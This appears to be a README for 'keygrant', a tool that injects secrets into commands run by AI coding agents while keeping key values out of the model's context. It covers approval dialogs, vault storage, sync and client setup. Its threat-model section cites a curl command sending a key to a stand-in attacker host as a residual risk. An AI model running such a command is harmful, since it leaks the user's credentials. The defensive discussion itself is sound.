Run commands with API keys injected per call — values never enter model context.

Per-command secret injection for AI coding agents. Secrets live in a local DPAPI-encrypted vault; the model's context only ever sees secret names — values are injected into the child process environment at exec time, and all output is redacted before it returns to the model.
Why: anything placed in an LLM's context can be exfiltrated (prompt injection, logs, generated code). The fix is architectural: keys never enter context, only the execution environment.
keygrant.py — vault + CLI
keygrant set NAME [--desc TEXT] — store a secret (value via stdin, never argv)keygrant list / rm NAMEkeygrant exec [--redact] NAMES -- CMD — run CMD with secrets injectedkeygrant revoke NAME|--all — revoke active approval grantskeygrant init — wire up a project (.mcp.json + CLAUDE.md guidance)keygrant_mcp.py — MCP server (stdio JSON-RPC, zero deps)
list_secrets — names/descriptions/usage only, never valuesexec_with_secrets — server-side exec with injection + forced output redactionuv tool install keygrant # or: pipx install keygrant
Requires Python ≥ 3.10. macOS ships Python 3.9, so a bare pip install
there fails; uv fetches a suitable Python automatically.
Then, in each project where agents should use secrets:
keygrant init
init adds a keygrant entry to the project's .mcp.json (merging with any
existing servers) and appends usage guidance for the model to CLAUDE.md,
both idempotently. Restart Claude Code in that folder to load the server.
Values live in the login Keychain; approval is a native dialog.

What this protects against:
What this does NOT protect against (known residual risks):
curl evil.com?k=%KEY%). The approval dialog shows the full
command — reviewing it is the control. Per-secret egress allowlists (binding
a key to permitted destination hosts) are on the roadmap.sh deploy.sh approves whatever deploy.sh does,
and the agent may have written that file. Treat script invocations as
approving the script.Every use of a secret — via the CLI or the MCP server — requires the user's
approval through a native, topmost dialog that shows the full command (deny
by default on a 60s timeout). Through the MCP server, approving lets that
exact command reuse the secret for 15 minutes in that session — handy
for retries — while any other command prompts again. Grants are held in the
server's memory only. The CLI prompts on every keygrant exec, so an agent
cannot bypass MCP approval by shelling out to it. keygrant revoke NAME|--all
voids earlier grants in every running session. The dialog will be replaced by a resident tray
app with toast notifications; the grant semantics stay the same.
%APPDATA%\keygrant\vault.jsonsecurity CLI; the first
read triggers the OS Keychain permission prompt — an extra OS-level gate);
~/.config/keygrant/vault.json holds metadata onlysecret-tool
(libsecret-tools + a running keyring daemon; approval dialogs need zenity);
the vault file holds metadata onlyThe vault file also records usage metadata (use count, last used) as the seed of an audit trail.
Optional end-to-end encrypted sync between your devices
(uv tool install 'keygrant[cloud]'). Values are encrypted on the device;
the server only ever stores ciphertext. Nothing is uploaded until you push.
keygrant cloud init # create an account; prints your Emergency Kit
keygrant push STRIPE_KEY # upload a local secret
keygrant devices add # on this device: shows a pairing code
keygrant pair # on the new device: enter the code, confirm fingerprints
keygrant sync # pull changes into the local vault
Design and threat model: docs/design/cloud-sync-client.md.
Source-derived launch command. Check the maintainer’s required arguments and credentials before running:
uvx keygrantMerge this template into ~/Library/Application Support/Claude/claude_desktop_config.json. Keep existing servers. Add any arguments, credentials, and permissions required by the maintainer; this template has not been install-tested.
{
"mcpServers": {
"io-github-bazingaedward-keygrant": {
"command": "uvx",
"args": [
"keygrant"
]
}
}
}Restart Claude Desktop completely for changes to take effect. Confirm the server appears connected in the client’s tool list, then try a read-only example from its documentation.
Claude Desktop setup referencekeygrantpypikeygrant works with any MCP-compatible client. Copy the config snippet from the Configuration section above and add it to the file shown for your client, then restart the application.
~/Library/Application Support/Claude/claude_desktop_config.jsonRestart Claude Desktop completely for changes to take effect.~/.cursor/mcp.jsonRestart Cursor for changes to take effect..vscode/mcp.jsonReload VS Code window for changes to take effect.~/.codeium/windsurf/mcp_config.jsonRestart Windsurf for changes to take effect..mcp.jsonSave at the project root, then start Claude Code in that project and review the MCP server approval prompt. Keep real credentials out of shared files.